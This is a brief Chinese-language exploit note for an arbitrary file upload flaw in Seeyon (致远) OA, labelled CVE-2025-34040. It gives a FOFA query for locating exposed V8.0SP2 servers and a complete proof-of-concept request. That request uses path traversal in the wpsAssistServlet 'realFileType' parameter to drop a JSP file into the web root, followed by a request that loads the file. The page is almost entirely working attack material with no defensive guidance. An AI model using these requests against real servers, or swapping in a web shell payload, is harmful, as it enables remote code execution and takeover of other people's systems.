致远OA存在文件上传导致RCE(CVE-2025-34040)¶

致远oa存在任意文件上传漏洞，可以获取服务器权限

fofa¶

app="致远互联-OA" && title="V8.0SP2"

poc¶

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("HelloWorld");%>
--59229605f98b8cf290a7b8908b34616b--

访问地址

GET /Hello.jsp HTTP/1.1
Host: